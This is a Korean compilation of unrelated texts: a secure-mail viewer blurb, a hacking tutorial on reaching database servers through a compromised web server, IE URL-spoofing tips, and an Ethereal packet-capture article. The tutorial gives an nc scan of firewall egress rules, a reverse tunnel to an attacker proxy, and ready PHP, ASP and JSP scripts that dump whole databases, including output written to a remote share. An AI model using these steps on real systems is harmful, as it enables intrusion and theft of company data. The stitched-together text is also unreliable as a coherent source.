AnySend Secure Mail Viewer v1.0.0.1 (AnySend2008 보안메일 전용 뷰어)
이 프로그램은 AnySend 2008로 보낸 암호화된 보안메일을 AnySend 2008 비구매자도
쉽게 확인할 수 있도록 제공되는 무료 프로그램입니다.
01. 보안메일 보내기 (보내는 사람)
AnySend 2008을 가지고 보안 메일을 보내려면 위와 같이 메일 내용을 입력한다
프로그램 상단에 보안메일 버튼을 클릭하고 비밀번호를 입력한뒤 Enc/Dec 버튼을 누른다.
위와 같이 본문의 내용이 암호화된 것을 확인할 수 있다. 이제 메일전송을 눌러서 메일을 보낸다.
위와 같이 메일이 성공적으로 발송된다.
02. 보안메일 확인하기 (받는 사람)
알 수 없는 누군가로부터 메일이 도착해 있다. 확인해보자.
위와 같이 본문엔 암호화 되었음을 알리는 메시지와 함께 알 수 없는 문자로 가득차 있다.
이제 AnySend Secure Mail Viewer로 메일 본문을 확인해보자.
먼저 프로그램을 실행하고 본문에 있는 알 수 없는 암호화된 문자열을 복사한다.
프로그램을 실행해서 복사한 문자열을 붙여넣기 한 후 비밀번호를 정확하게 입력한다.
입력이 완료되면 '메시지보기' 버튼을 클릭한다.
위 그림과 같이 비밀번호를 올바르게 입력하면 정상적으로 메일 본문을 확인할 수 있다.
이 프로그램은 AnySend 2008의 보안메일을 확인할 수 있는 보안메일 전용 뷰어입니다.
AnySend 2008 구매자 분들께서는 보안메일을 사용하기 전에 상대방(비구매자)에게
보안메일 전용 뷰어를 보내주거나 다운로드 받을 수 있도록 알려주셔야 합니다.
또한 받는 사람은 비밀번호를 반드시 알아야 합니다.
비밀번호를 모르면 보안메일을 확인할 수 없는 것은 당연한 것입니다.
또한 발신자/수신자 모두 비밀번호를 잊어버리게 되면 제작자도 확인해 드릴 방법이 없으며
이것은 제자자의 책임이 아닙니다.
유용하게 사용하시기 바라며 이 프로그램은 무료 프로그램으로서
개인/기업/단체/영리/비영리단체 누구나 다운로드하여 사용할 수 있습니다.
압축을 풀고 설치하신 후 사용할 수 있습니다.
웹서버를 경유한 DB서버 해킹
방화벽의 Private또는 DMZ에 웹서버또는 DB와 연동할 수 있는
서버를 점령 후에 어떻게 DB 서버를 해킹하는가에 대한 궁금증 해결을 위해 작성한 문서이다.
-----------------------------------------------------------------------------------------------------------------
I. 네트워크 구성도
1) 인터넷 -------방화벽------- 웹서버 --------방화벽---------DB서버
2) 인터넷 -------방화벽------- 웹서버
DB서버
(DMZ존)
------------------------------------------------------------------------------------------------------------------
II. 개요
본 문서에 있는 방법은 이미 다 알고 있는 내용이거나 인터넷에 찾아 보면 다 나오는 내용들이다
내용상의 틀린 부분이 있으면 지적해 주시면 감사감사~~~
Private 또는 DMZ에 위치하는 DB 서버를 해킹 하기 위해선
먼저 DB 접속 인증 id/passwd 또는 sid 를 알아야 하며 또한 웹서버를 경유하여 DB와 접속을 하여야 하므로
어떤 방법으로든 웹서버는 점령하여야 한다.
웹서버 점령에 관해서는 이 문서에서는 언급 하지 않는다.
이유는 너무나 많은 방법이 있으며 나도 그 모든 방법에 대해서 모른다.
또한 이와 같이 삽질을 안하고도 대다수의 웹서버의 temp,tmp디렉토리 또는 admin 권한으로 DB의 내용을 획득할
수도 있으나 어쩔수 없이 DB 쿼리를 해야 하는 상황에 대해서 설명한다.
물론 해당 웹서버를 직접 공격하지 않고 sql injection 공격을 할 수 있으면 아래와 같은 삽질은 하지 않아도 될것이다.
일단 방화벽 내의 웹서버를 점령한 후 DB서버를 해킹 하는 방법은 상당히 많은
방법이 있으며 dbms의 종류 웹서버의 종류 cgi의 종류에 따라 많은 조합의 공격법이 있다.
또한 DB 서버를 해킹할때 root권한 획득과 같은 방법은 별 필요가 없을 것이다.
왜냐하면 결국 DB 서버의 해킹의 목적은 DB의 내용을 획득하는 것이기 때문에 root권한이 필요가 없다.
DB를 쿼리하기 이전에 웹서버 앞의 Firewall Rule에 따라 접근개념이 틀려 질 수 있으므로
아래와 같이 크게 2가지 분류로 나누어 접근하도록 하겠다.
Firewall Rule을 파악하기 위해서 공격자의 PC에 Sniffing Tool을 설치하고 해당 웹서버에는 nc를 설치한다.
공격자의 PC에서는 해당 웹서버에서 공격자 PC로 전송되는 패킷에 대한 검사를 수행하고
해당 웹서버에서는 다음과 같이 실행한다
nc -v -w2 -z [공격자 PC IP] 1-65535
이는 해당 웹서버에서 공격자 PC로의 어떤 서비스가 통과 가능한지 파악하기 위함이다.
Firewall Rule에서 특정 서비스에 대해서만 Accept되어 있을 수 있다 예를 들어 외부로 나가는 dns또는 특정 Application의
update서비스와 같이 특정 서비스만 Accept되어 있으면 그 서비스를 판단할 수 있다.
또한 공격자의 PC에서 Sniffing을 설치하여 패킷 검사를 하는 이유는 nc는 nmap과 같이 closed와 filtered를 구분하지
못하기 때문에 수동으로 패킷을 검사하여 확인을 한다.
nc수행 결과 공격자의 PC로 한개 이상의 syn 패킷이 전송이 된다면 아래 1번 방법으로 DB 쿼리가 가능하다
2번 방법은 웹서버에서 인터넷구간으로의 Outbound Rule이 서비스 전체에 대해 Deny일 경우로
해당 웹서버의 cgi를 이용하여 DB쿼리를 수행한다.
-------------------------------------------------------------------------------------------------------------------
III. 실전 DB 해킹
1) Firewall Rule에서 Source IP가 웹서버에서 외부 인터넷구간으로의 Outbound Rule이 Accept인 경우
이는 port redirect(cevert tunnel, reverse telnet)이 가능한 상태이다.
즉 외부에서 해당 웹서버의 쉘을 띄울수가 있는 상태이므로 쉽게 DB쿼리가 가능하다.
우선 공격대상 네트워크는 아래와 같다고 가정한다.
실제 Firewall/네트워크 구성이 상당수 기업들이 이와 유사하게 설정 되어 있다.
===================================================================================================================
[공인:210.210.210.210] [공인: 220.220.220.220] [사설:192.168.0.100]
공격자 PC1 -------------------- 방화벽 ----------------- 웹서버 ------------방화벽----------------- DB 서버
Any 웹서버 80 Accept 웹서버 DB서버 DB서비스 Accept
Any 웹서버 Any Deny Any DB서버 Any Deny
웹서버 Any 8080 Accept
웹서버 Any Any Deny
공격자 PC2(Proxy 서버)
[공인:210.210.210.211]
=====================================================================================================================
port redirect는 yatunnel이란 tool을 이용하여 아래와 같이 수행한다.
만일 웹서버에 sql client툴이 있을경우 이를 이용하면 쉽게 DB에 접속하여 쿼리를 할 수 있으나
경험상 아마도 없을 것이다. ^^;
- 공격자 PC2(Proxy 서버)에서의 작업
Proxy 서버측에서 웹서버와 Tunneling 할 port를 open한다.
[root@Proxy Server]# ./tun-proxy -p 12345
- 웹서버에서의 작업
tun-server의 소스를 보면 127.0.0.1:22로 redirect를 한다.
이 부분은 자신이 원하는 주소와 port를 수정하여 사용 가능하다.
즉, 다른 호스트로 redirect가 가능하다. 즉 이를 192.168.0.100:1433으로 수정한다.
MSSQL:1433, Oracle:1521, MySQL:3306
[green@Internal Server]$ ./tun-server -h 210.210.210.211 -p 12345
- 공격자 PC1 에서의 작업
각종 SQL Client를 이용하여 210.210.210.211:12345로 DB와 Connect하고 DB 쿼리를 한다.
MSSQL, MySQL, Oracle에 대한 SQL Client는 아래 사이트에 있는 SQL Gate가 사용이 용이하고 쉽다.
http://www.sqlgate.com/html/index.html
* yatunnel을 이용한 SQL Client 연결은 한번도 테스트는 해 보지 않았다
안될 이유는 없을것 이라고 판단이 되나 누군가 테스트 해 볼 기회가 된다면 안되면 연락을 주길 바란다.
2) Firewall Rule에서 Source IP가 웹서버에서 외부 인터넷구간으로의 Outbound Rule이 Deny인 경우
Outbound Rule이 Deny일 경우 순전히 해당 웹서버의 cgi를 이용하여 DB 쿼리를 하여야 한다.
이는 상당히 많은 조합이 필요하다 ㅠㅠ;
가장많이 사용되는 php, asp, jsp를 예로 들어 보겠다.
2-1) php를 사용할 경우
가장 먼저 DB Name과 Table Name을 알아야 DB 쿼리를 한다.
웹서버의 php파일들을 뒤져서 DB Name과 Table Name을 찾아 낼수 있지만 이 얼마나 노가다 인가...
그래서 아래와 같은 DB 구조 파악을 할 수 있는 php파일을 실행 시키자.
아래의 예제는 Mysql을 예로 들었다.
물론 아래의 몇몇 변수는 시스템 환경에 맞게 수정을 하여야 한다.
------------------------------------디비/테이블 알아내기---------------------------------------------
<?
$db = mysql_connect($host, $user, $password);
mysql_select_db($database);
//전체 DB보기
$db_list = mysql_list_dbs($db);
echo "전체 DB >>>>>";
while ($row = mysql_fetch_object($db_list)) {
$database= $row->Database;
echo "<a href=$PHP_SELF?dbname=$database>$row->Database </a>|| ";
}
$table_rs = mysql_list_tables($database); ////// 테이블을 볼 테이타 베이스명
echo "<style>td {font-size:9pt}</style>
<table >
<tr>";
$rows = 0;
while($tables = mysql_fetch_array($table_rs)){
$query = "select * from $tables[0]";
$field_rs = mysql_query($query, $db);
$field = mysql_fetch_field($field_rs); /////////// 필드명 구하기
$cols = mysql_num_fields($field_rs); /////////// 필드수 구하기
if($rows%5 == 0) echo "</tr><tr><td height=20></td></tr><tr>"; //// 칼럼수가 5개 이면 줄 바꿈
echo "<td valign=top>
<table width=180 cellspacing=0 border=1 bordercolordark=white bordercolorlight=black>
<tr>
<td colspan=2 align=center><b>$tables[0]</b></td>
</tr>
<tr align=center>
<td >필드명</td>
<td >Type</td>
</tr>";
for($i=0; $i < $cols; $i++){
echo "
<tr align=right>
<td>".mysql_field_name($field_rs, $i)."</td>
<td>".mysql_field_type($field_rs, $i)." (".mysql_field_len($field_rs, $i).")</td>
</tr>\n";
}
echo "</table></td>";
$rows++;
}
echo "</tr></table>";
?>
-------------------------------------------------------------------------------------------------------------
-----------------------------테이블의 데이타 쿼리하기--------------------------------------------------------
// 데이타 양이 많을경우 디져버릴수 있으니 게시판 형태로 수정하여야 한다.
<?
$connect=mysql_connect("localhost","user_id","password") or die("Fail to connect SQL");
mysql_select_db( "database_name",$connect);
print "<HTML>n";
echo("<h2>
테이블 $tab_name 의 모든 데이타를 가져옵니다
</h2>");
print " <form action=$PHP_SELF>";
$stmt = "SELECT * FROM $tab_name";
$nresult = mysql_query($stmt,$connect );
$nrows = mysql_affected_rows();
$results=mysql_fetch_array($nresult);
if ( $nrows > 0 ) {
print "<TABLE BORDER="1">n";
print "<TR>n";
$j=0;
while ( list( $key, $val ) = each( $results ) ) {
if ( $j%2==1 ) print "<TH> $key</TH>n";
$j++;
}
print "</TR>n";
$k=0;
for ( $k = 0; $k < $nrows; $k++ ) {
mysql_data_seek($nresult,$k);
$results=mysql_fetch_array($nresult);
$m=0;
while ( list( $key, $val ) = each( $results ) ) {
if ( $m%2==1 ) print "<TD> $val</TD>";
$m++;
} // end of while
print "</TR>";
} // end of for
print "</TABLE>n";
} else {
echo "No data found<BR>n";
}
print "$nrows Records Selected<BR>n";
print " INPUT TABLE NAME <input type=text name=tab_name value=$tab_name>";
print " <br> <input type=submit value='검색'>";
print " </form>";
print " </html>";
?>
-------------------------------------------------------------------------------------------------------
------------------------------------테이블의 쿼리값을 파일로 저장---------------------------------------
<?
$connect=mysql_connect("localhost","user_id","password") or die("Fail to connect SQL");
mysql_select_db( "database_name",$connect);
$stmt = "select * from tablename into outfile 'filename'";
mysql_query($stmt,$connect );
?>
--------------------------------------------------------------------------------------------------------
2-2) asp 를 사용할 경우
asp를 사용한다면 90% 이상 mssql과 조합을 이루고 있을 것이다.
Mssql은 sp_maskwebtask API가 있어 상당히 편리(?)하다.
쿼리한 결과값을 화면에 출력하는 수고를 하지 않아도 된다.
이 방법은 asp에만 사용되는 방법이 아니라 해당 DBMS가 MSSQL이라면 php또는 jsp 에서도 해당 cgi에 맞게 DB Connect후
sql query만 아래와 같이 실행하면 된다.
sp_maskwebtask를 이용하여 쿼리의 결과값을 Local서버 또는 Remote서버로 html로 저장시킬 수 있다.
EXEC sp_makewebtask 'c:\inetpub\wwwroot\sqloutput.html', 'select * from sysobjects where xtype = ''U'''
이 명령어로 sysobjects에 있는 User가 생성한 DB 테이블을 쿼리한 결과값을 c:\inetpub\wwwroot\sqloutput.html에 저장한다.
EXEC sp_makewebtask '\\10.0.0.8\public\hack.htmk', 'SELECT * FROM user'
또한 쿼리한 결과값을 remote에 저장시킬 수 있다.
---------------------------------------------------------------------------------------------------------
테이블 정보 알아내기
<%
set Conn = server.createobject("adodb.connection")
Conn.Open "test","sa", ""
set rs = Conn.Execute(" EXEC sp_makewebtask 'c:\inetpub\wwwroot\sqloutput.html', 'select * from sysobjects where xtype = ''U''' ")
%>
-----------------------------------------------------------------------------------------------------------
자 이제 sales 테이블의 결과를 보자.
-----------------------------------------------------------------------------------------------------------
해당 sales 테이블의 전체 내용 쿼리하기
<%
set Conn = server.createobject("adodb.connection")
Conn.Open "test","sa", ""
set rs = Conn.Execute(" EXEC sp_makewebtask 'c:\inetpub\wwwroot\aaa.html', 'select * from sales' ")
%>
-----------------------------------------------------------------------------------------------------------
우와 간단하고 좋다... 역시 MS...
2-3) jsp 를 사용할 경우
jsp일 경우 Windows, *nix와 같이 시스템에 상관없이 운영되기 때문에
연결한 DBMS가 MSSQL, MYSQL, Oracle, Informix 등 다양한 DBMS와 연결을 한다.
가장 많이 사용되는 MSSQL과 Oracle을 예로 들어보잣...
먼저 MSSQL은 asp를 사용할 때와 마찬가지로 sp_maskwebtask API를 사용해서 DB 쿼리를 수행할 수 있다.
---------------------------------------------------------------------------------------------------------
MSSQL 테이블 정보 알아내기
<%@ page contentType="text/html; charset=euc-kr" %>
<%@ page import="java.sql.*, java.io.*"%>
<%
String url ="jdbc:freetds:sqlserver://192.168.0.10:1433/WEBDB";
String id = "sa";
String pass = "";
Class.forName("com.microsoft.jdbc.sqlserver.SQLServerDriver");
Connection conn = DriverManager.getConnection(url,id,pass);
Statement stmt = conn.createStatement();
String sql = " EXEC sp_makewebtask 'c:\inetpub\wwwroot\sqloutput.html', 'select * from sysobjects where xtype = ''U''' ";
ResultSet rs = stmt.executeQuery(sql);
%>
-----------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
MSSQL sales 테이블 쿼리하기
<%@ page contentType="text/html; charset=euc-kr" %>
<%@ page import="java.sql.*, java.io.*"%>
<%
String url ="jdbc:freetds:sqlserver://192.168.0.10:1433/WEBDB";
String id = "sa";
String pass = "";
Class.forName("com.microsoft.jdbc.sqlserver.SQLServerDriver");
Connection conn = DriverManager.getConnection(url,id,pass);
Statement stmt = conn.createStatement();
String sql = " EXEC sp_makewebtask 'c:\inetpub\wwwroot\aaa.html', 'select * from sales' ";
ResultSet rs = stmt.executeQuery(sql);
%>
-----------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
Oracle 테이블 정보 알아내기
<%@ page contentType="text/html; charset=euc-kr" %>
<%@ page import="java.sql.*, java.io.*"%>
<%
Class.forName("oracle.jdbc.driver.OracleDriver");
String JDBCDriverType = "jdbc:oracle:thin";
String DBHost = "test.inzen.com";
String Port = "1521";
String SID = "ORA8";
String url = JDBCDriverType+":@"+DBHost+":"+Port+":"+SID;
String userID = "test";
String password = "test";
String query = "select * from tab";
Connect con = DriverManager.getConnection(url, userID, password);
Statement stmt = con.createStatement();
ResultSet rs = stmt.executeQuery(query);
File outputFile = new File("jsp웹루트디렉토리/oratable.txt");
FileWriter fout = new FileWriter(outputFile);
PrintWriter ps = new PrintWriter(new BufferedWriter( fout ));
while ( rs.next() ) {
ps.print ( rs.getString ( 1 ) ) ;
ps.print ( " " ) ;
ps.println ( rs.getString ( 2 ) ) ;
}
ps.close() ;
%>
---------------------------------------------------------------------------------------------------------------
위의 File outputFile 에 파일명을 지정하는데 절대 경로와 상대경로 다 쓸 수 있다.
만약 jsp 의 엔진으로 tomcat 을 사용하고 있는경우 /usr/local/jakarta-tomcat/bin 에 default 로 파일이 생성되게 된다.
그러므로 웹에서 불러 올수 있는 경로를 지정해야 한다.
/usr/local/jakarta-tomcat/webapps 의 위치가 jsp 웹 루트 디렉토리라면
File outputFile = new File("/usr/local/jakarta-tomcat/webapps/oratable.txt");
이런 식으로 지정을 한다.
---------------------------------------------------------------------------------------------------------------
Oracle 특정 테이블 쿼리하기
<%@ page contentType="text/html; charset=euc-kr" %>
<%@ page import="java.sql.*, java.io.*"%>
<%
Class.forName("oracle.jdbc.driver.OracleDriver");
String JDBCDriverType = "jdbc:oracle:thin";
String DBHost = "test.inzen.com";
String Port = "1521";
String SID = "ORA8";
String url = JDBCDriverType+":@"+DBHost+":"+Port+":"+SID;
String userID = "test";
String password = "test";
String query = "select gongi, day from gongi";
Connect con = DriverManager.getConnection(url, userID, password);
Statement stmt = con.createStatement();
ResultSet rs = stmt.executeQuery(query);
File outputFile = new File("jsp웹루트디렉토리/oratable.txt");
FileWriter fout = new FileWriter(outputFile);
PrintWriter ps = new PrintWriter(new BufferedWriter( fout ));
while ( rs.next() ) {
ps.print ( rs.getString ( 1 ) ) ;
ps.print ( " " ) ;
ps.println ( rs.getString ( 2 ) ) ;
}
ps.close() ;
%>
---------------------------------------------------------------------------------------------------------------
The End.
by 작두이글루
현재 웹페이지의 URL의 유효성 확인
|
1. Internet Explorer의 주소 표시줄에 아래 명령을 입력한 다음 Enter 키를 누릅니다.
2. 현재 방문하고 있는 웹페이지의 실제 URL 웹주소를 표시합니다.
다음 코드를 복사해서 인터넷 익스플로어 주소창에 입력하고 Enter 키를 누르면 웹 사이트 URL의 자세한 설명을 볼 수 있습니다.
실제 URL과 주소 표시줄 URL을 비교해서 일치하지 않으면 웹 사이트가 거짓 주소를 나타내는 것일 수 있습니다.
3. Internet Explorer의 열어본 페이지목록 창을 사용하여 현재 웹 사이트의 실제 URL 확인
loadTOCNode(4, 'moreinformation');
Internet Explorer의 열어본 페이지 목록 탐색 창을 사용해서 웹 페이지의 URL을 확인할 수 있습니다.
인터넷 익스플로어에서 보기--> 탐색 창 --> 열어 본 페이지 목록을 누릅니다. 주소 표시줄의 URL을 열어본 페이지 목록에 나타나는 URL과 비교합니다. 일치하지 않으면 웹 사이트가 거짓 주소를 나타내는 것일 수 있다.
4. 하이퍼링크가 사용하는 URL 확인하는 방법
하이퍼링크가 사용하는 URL을 확인하려면 다음과 같이 하면 된다.
1) | 링크를 마우스 오른쪽 단추로 누른 다음 바로 가기 복사를 누릅니다. |
2) | 시작을 누르고 실행을 누릅니다. |
3) | notepad를 입력한 다음 확인을 누릅니다. |
4) | 메모장의 편집 메뉴에서 붙여넣기를 누릅니다. |
이렇게 하면 하이퍼링크의 전체 URL을 확인하고 Internet Explorer가 사용할 주소를 확인할 수 있습니다.
다음은 스푸핑 웹 사이트로 이동할 수 있는 URL Spoofing에 사용되는 문자들이다.
• | %00 |
• | %01 |
• | @ |
예로, 다음 형태의 URL은 http://example.com으로 연결되지만 Internet Explorer에서 주소 표시줄이나 상태 표시줄의 URL은 http://www.wingtiptoys.com으로 나타날 수 있다.
Ethereal 고수가 되자
최성열| 파이오링크 기술지원센터장
한국의 큰 명절인 지난 추석에 필자는 중요한 일 때문에 가족들과 떨어져 일본에서 보내야만 했다. 신규로 구성하는 네트워크에서 문제가 발생해 일본의 파트너들과 함께 일을 했다. 그곳에서 발생한 문제는 이더넷 패킷이 일부 변경되거나 패킷이 가끔 손실되는 현상이었다. 어떻게 해서든 문제를 찾아야 하는 상황이라 파이어월, 2, 3, 4계층 스위치 등 어느 구간에서 문제가 발생하는지를 찾기 위해 여러 명의 엔지니어들과 함께 일했다.
보통 패킷을 분석할 때는 예상되는 구간에 한 대 정도만 분석기를 설치하고 수집된 데이터를 기반으로 분석을 하는데, 이번에는 어떤 장비도 믿을 수가 없었기에 각 구간마다 분석기를 설치했다. 덕분에 당시 설치했던 패킷 분석기만 13대였다(사실 필자가 문제 해결을 위해 이렇게 많은 장비를 사용하기는 처음이었다). 이때 사용한 프로그램으로는 상용으로 가장 많이 사용되는 스니퍼(Sniffer)와 공개용으로 많이 사용되는 이더리얼(Ethereal)이었다.
대부분의 엔지니어들의 노트북에는 이 두 개의 프로그램이 탑재돼 있을 것이며, 어떤 시스템을 사용하는가는 그 구간을 담당하는 엔지니어가 익숙한 정도에 달려 있다.
패킷 분석기의 역할과 중요성
며칠 동안 필자가 뚫어지라 바라보았던 이더리얼과 스니퍼를 우리는 패킷 분석기(Packet Analyzer)라고 부른다. 이들 솔루션은 연결된 네트워크에 지나가는 패킷들을 하나도 빠짐없이 모두 그 형태에 맞게 나열해주고 일부 필요한 것들은 통계로 알려준다.
이 같은 패킷 분석기의 사용은 문제를 해결할 때 뿐만이 아니라 여러분들이 책으로만 봐왔던 네트워크 프로토콜의 실제 동작을 직접 확인하는 용도로 사용할 수도 있으며, 필요에 따라서는 책으로 소개되지 않은 애플리케이션(P2P, 바이러스, 메신저)에 대해서도 쉽게 파악하는 용도로 사용할 수도 있다.
패킷 분석기는 (그림 1)처럼 확인하고자 하는 구간에 설치해 패킷들을 캡처하고, 관리자를 이를 기반으로 문제를 분석할 수 있도록 한다. 일반적으로 컴퓨터에서 어떤 통신이 안될 경우에는 해당 컴퓨터에 이더리얼을 설치하거나, 해당 컴퓨터가 설치된 같은 네트워크에 연결해 문제가 있는 컴퓨터와 동일한 동작을 해 볼 수도 있다. (그림 1)에서 무언가를 자세하게 들여보는 듯한 '돋보기’그림이 패킷 분석기라는 툴의 특징을 가장 잘 나타내준다고 할 수 있다.
(화면 1) 이더리얼 실행 화면
이더리얼과 같은 패킷 분석기의 값어치는 여러분들이 어떻게 사용하느냐에 따라서 하늘과 땅 차이가 난다. (화면 1)의 이더리얼 실행 화면에서 볼 수 있듯이 짧은 순간에도 상당히 많은 패킷들을 수집하므로 툴에서 제공하는 여러 기능을 적절히 이용할 줄 아는 지혜를 가져야 한다. 그렇지 않으면 짧은 내용의 패킷 분석을 위해서 너무 많은 시간을 들여야 할지도 모른다.
보통 이더리얼을 처음 접한 사람들은 모두들 큰 그림의 패킷 하나하나를 제일 깊은 단계로 생각을 한다. 하지만 패킷 분석기의 가장 중요한 특징은 바로 패킷 하나를 세부적인 단계로 나눠볼 수 있다는 점이다. (화면 1)을 보고 여러분들이 이미 알아차렸을 수도 있지만 대부분의 툴은 패킷 하나하나의 세부 구조와 정보를 우리가 알기 쉽게 번역해 주고 있다.
(화면 2) 웹에서 GET을 보낼 때의 패킷 세부 내용
그동안 필자의 연재를 지속적으로 보아온 독자라면 (화면 2)를 조금만 살펴봐도 별 어려움 없이 내용을 이해할 수 있을 것이다. (화면 2)는 여러 패킷도 아니고 단 하나의 패킷이다. 앞에서 설명했지만 패킷의 리스트(List)를 주욱 살펴봐서 어떤 패킷이 오는지 혹은 오지 않는지를 따지는 것은 아주 기본적인 사항이며, 나아가서는 이렇게 패킷 하나하나를 살펴서 어떤 정보들을 주고받았는지도 살펴야 한다(아마 시간이 지나면 여러분들도 그렇게 될 수 밖에 없다. 왜냐하면 때로는 패킷은 다 왔는데도 통신이 안 되는 경우가 있기 때문이다).
이더리얼 구하기와 설치하기
이더리얼은 공개용이므로 홈페이지(www.ethereal.com)에 가면 누구라도 손쉽게 구할 수가 있으며 설치 또한 간단하다. 하지만 주의할 점은 이더리얼 설치 전에 컴퓨터의 LAN 카드로 들어오는 패킷들을 이더리얼로 수집해 주는 Winpcap(www.winpcap.org)을 먼저 설치해야 한다. 이 프로그램이 없으면 이더리얼은 무용지물이다.
현재 제공되는 이더리얼의 버전은 0.10.12 버전이다. 맨 앞이 1이 아닌 0이어서 불안해 할 수도 있지만 이미 여러 차례 패치가 됐고 많은 사람들이 사용하고 있으므로 실무에 사용해도 전혀 손색이 없다(사실 상용 버전보다는 디자인 측면에서 많이 부족하지만 요즘 나온 버전에는 버튼에 아이콘들도 추가해서 제법 틀을 갖춰가고 있다).
<이더리얼의 탄생 과정>
이더리얼은 리눅스 계열에서 사용한 패킷 덤프(dump) 프로그램인 'tcpdump'라는 툴에서 시작됐다. tcpdump는 리눅스에서 시스템에서 처리하는 패킷을 다양한 옵션으로 볼 수 있는 명령어이고, 지금도 리눅스 애호가로부터 많이 사용되고 있는 명령어다. 이더리얼은 리눅스에서도 비슷한 화면구조로 돼 있는 GUI 프로그램이며, 필자가 설명하고 있는 것은 이것을 윈도우에서 사용할 수 있도록 돼 있는 프로그램이다. 이더리얼 홈페이지를 자세히 살펴보면 깜짝 놀랄 세 가지 일이 있다.
첫번째는 현재 이더리얼은 719개의 다양한 프로토콜을 지원한다는 점이다. 이 세상에 얼마나 많은 프로토콜이 존재하는지는 필자도 잘 모르지만, 실무에서 사용하고 있는 프로토콜 대부분은 아마도 이더리얼이 지원할 것이다(프로토콜이 지원된다는 것은 (화면 2)에서 처럼 해당 프로토콜을 세부적으로 사람이 볼 수 있도록 정리할 수 있다는 의미다).
두번째로는 정말 다양한 플랫폼에서 동작한다는 점이다. 리눅스(레드햇, SuSE, 데비안, PLD, ROCK, SCO, 슬랙웨어), 솔라리스(인텔, 썬), Irix, FreeBSD, OpenBSD, AIX, HP-UX, 맥킨토시 등 다양한 플랫폼에서 동작한다. 아마 어떤 상용 툴도 이렇게 다양한 플랫폼은 지원하지 못할 것이다.
그리고 마지막 특징으로는 NAI의 스니퍼, 썬의 Snoop, 쇼미티의 Surveyor, AIX의 iptrace, 마이크로소프트의 Network Monitor, HP-UX의 nettl, 와일드패킷의 Etherpeak 등 여러 상용 패킷 분석기에서 캡처한 것들도 볼 수가 있다는 것이다. 이 같은 놀라운 특징들 때문에 이더리얼의 사용을 강력하게 추천하는 것이다.
필자가 이더리얼을 사용하는 법
스니퍼 사용시 캡처를 할 때 필터(Filter)를 사용하고, 캡처가 끝난 후에 필요에 따라서 캡처된 데이터에서 필터를 사용하는 방법을 사용했었다. 반면 이더리얼의 특징 중 하나가 캡처하는 화면을 실시간으로 보는 것은 기본이고, 필요에 따라서는 캡처하면서도 각종 옵션으로 화면에 나타나는 것들을 조절, 분석하는 데 많은 도움을 줄 수가 있다는 점이다. (화면 3)은 이더리얼에서 캡처를 시작할 때 화면이다.
(화면 3) 캡처를 시작할 때의 다양한 옵션
이더리얼을 비롯한 대부분의 패킷 분석기는 캡처 시작 전에 몇 가지 기본적인 설정을 하고나서 시작한다. 여러분들이 처음 이더리얼을 구동했다면 제일 먼저 어떤 인터페이스에서 구동할 것인가를 결정해야 한다. 많은 사람들이 이 선택을 잘못하고 캡처를 시작하면서 되려 이더리얼이 몹쓸 툴이라고 흉보는 경우가 많다.
필자는 그동안 많은 시간을 투자해 실시간으로 캡처하면서 보는 습관을 들였다. 이 방법이 분석에 많은 도움이 돼 이제는 'Display Options'에 있는 두가지 옵션(화면 3에서 선택된)을 대부분 기본으로 사용한다. 이 옵션을 사용하면 실시간으로 캡처된 리스트들이 자동으로 업데이트되고, 리스트를 보여주는 스크롤이 자동으로 올라가 최근 패킷만 볼 수가 있다. 때문에 실시간으로 패킷을 보고 싶은 필자에게는 아주 유용하다.
(화면 3) 중 'Name Resolution'이라는 부분은 화면에 보여지는 MAC, IP, TCP/UDP 포트 등을 연관된 이름들로 확인해 보여주는 옵션이다. 예를 들면 MAC은 앞에 있는 3바이트가 제조사 MAC이기 때문에 이를 검색해 보여주고, IP에 해당하는 컴퓨터 이름(DNS 이름), TCP/UDP에 해당하는 프로토콜 이름(TCP 80 → HTTP)으로 보여준다.
하지만 이 옵션은 유용하면서도 실시간으로 많은 패킷들을 받아서 보여줘야 하는 프로그램 입장에서는 많은 부하를 줄 수 있다. 그러니 수십 Mbps 이상을 캡처할 때는 가급적 이들 옵션은 사용하지 않는 것이 낫다(하지만 실제로는 여러분이 직접 경험하고 느껴본 후에 어떤 것이 효율적일지 나만의 옵션을 찾는 게 중요하다).
만약 실시간으로 패킷을 볼 게 아니라 필요에 따라서 캡처했다가 나중에 분석할 계획이라면 파일로 저장하는 옵션을 선택하자. 네트워크에 발생하는 문제들은 이번에 필자가 일본에서 겪었던 것처럼 언제 어느때 발생할지 모르는 경우가 있기 때문에 그것 때문에 실시간으로 패킷을 계속 보고 있는 것이 때로는 바보같은 일이기 때문이다.
이 경우에는 패킷을 일정한 사이즈, 시간마다 자동으로 저장해 나중에 분석이 필요할 때 어느 파일부터 선택해서 분석해야 하는지에 도움이 될 수 있다. 그렇다고 내 컴퓨터의 하드디스크가 크다고 무조건 수 기가바이트로 남기는 것은 나중에 분석을 안하겠다고 하는 것과 마찬가지다. 더구나 윈도우도 그렇게 큰 크기는 읽지 못할뿐더러 수백 메가바이트나 되는 데이터를 프로그램에서 띄운다는 것은 절대 불가하다.
캡처 필터/화면 필터 잘 쓰는 사람이 고수
이더리얼의 고수는 바로 필터를 자유자재로 사용하는 사람이다. 우선 캡처 필터는 리눅스에서 tcpdump를 한번이라도 써 봤던 사람이라면 이해할 만한 문법으로 돼 있다. 처음에는 어려워 보이지만 조금만 이해하면 패킷의 다양한 옵션까지도 선택할 수가 있다.
캡처 필터는 수동으로 입력하는 게 기본인데, 잘 모르겠다면 (화면 3)에 있는 캡처 필터 부분을 클릭해 보면 기본 예제를 볼 수 있다. 물론 'Help'를 누르면 추가 예제 몇 개가 더 나올 것이다. 여기서 중요한 것은 단지 필터 한 개를 잘 사용하는 것이 아니라는 점이다. and, or, not 등의 다양한 연산을 잘 사용하는 것이 제일 중요하다. 다음은 이더리얼에 있는 예제들이다.
(1) 08:00:08:15:ca:fe 라는 MAC을 가진 호스트에서 사용하는 패킷만 캡처
ether host 08:00:08:15:ca:fe
(2) 192.168.0.10라는 IP 주소에서 오는 패킷이나 그쪽으로 향하는 패킷 캡처
host 192.168.0.10
(3) TCP 프로토콜 중 포트 80을 사용하는 패킷 캡처
tcp port 80
(4) IP 주소가 192.168.0.10이면서 TCP 포트 80을 사용하지 않는 패킷 캡처
host 192.168.0.10 and not tcp port 80
위의 예 뿐만이 아니라 arp, 출발지(src), 목적지(dst), 서브넷 기준으로도 구분이 가능하고 패킷사이즈에 따른 캡처도 가능하다. 이를 가장 잘 익힐 수 있는 방법은 메뉴얼을 읽거나 tcpdump 옵션을 찾아보는 것이다.
